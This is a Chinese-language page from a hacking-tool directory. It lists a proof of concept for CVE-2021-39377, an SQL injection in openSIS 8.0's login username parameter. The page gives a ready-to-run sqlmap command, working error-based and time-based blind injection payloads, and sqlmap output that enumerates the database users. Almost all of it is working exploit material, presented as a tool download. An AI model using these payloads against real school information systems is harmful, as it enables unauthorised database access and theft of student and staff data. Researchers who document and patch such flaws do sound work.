Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-39377 — CVE-2021-39377 的概念验证,这是 openSIS 8.0 中通过 username 参数存在的 SQL 注入漏洞,可利用基于错误和基于时间的盲注攻击实现数据库接管。 | Kitploit
工具/GitHubGitHub/security-n/cve-2021-39377
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试数据库安全
GitHubsecurity-n/cve-2021-39377

CVE-2021-39377

CVE-2021-39377 的概念验证,这是 openSIS 8.0 中通过 username 参数存在的 SQL 注入漏洞,可利用基于错误和基于时间的盲注攻击实现数据库接管。

查看仓库
15年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

OPENSIS 8.0 SQL 注入漏洞 CVE-2021-39377

当使用 MySQL(MariaDB)作为应用程序数据库时,openSIS 8.0 版本存在 SQL 注入漏洞。恶意攻击者可以通过易受攻击的 username= 参数向 MySQL(MariaDB)数据库发出 SQL 命令。

易受攻击的 PHP 页面:

index.php - username 参数

易受攻击的 Payload

sqlmap "http://localhost:8081/index.php" --users --data="USERNAME=admin&PASSWORD=test1234%21&language=en&log=" --dbms="MySQL" --level=3 --risk=2

SQL 注入:

http://localhost:8081/index.php

root@kitploit:~
Parameter: USERNAME (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: USERNAME=admin') AND (SELECT 4391 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(4391=4391,1))),0x716b717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IzoO&PASSWORD=test1234!&language=en&log=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: USERNAME=admin') AND (SELECT 2137 FROM (SELECT(SLEEP(5)))BwzJ)-- sbsL&PASSWORD=test1234!&language=en&log=

[22:35:47] [INFO] testing MySQL
[22:35:47] [INFO] confirming MySQL
[22:35:47] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.4.21
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[22:35:47] [INFO] fetching database users
database management system users [3]:
[*] 'mariadb.sys'@'localhost'
[*] 'mysql'@'localhost'
[*] 'root'@'localhost'

发现者:Nathan Johnson,2021 年 8 月

下载工具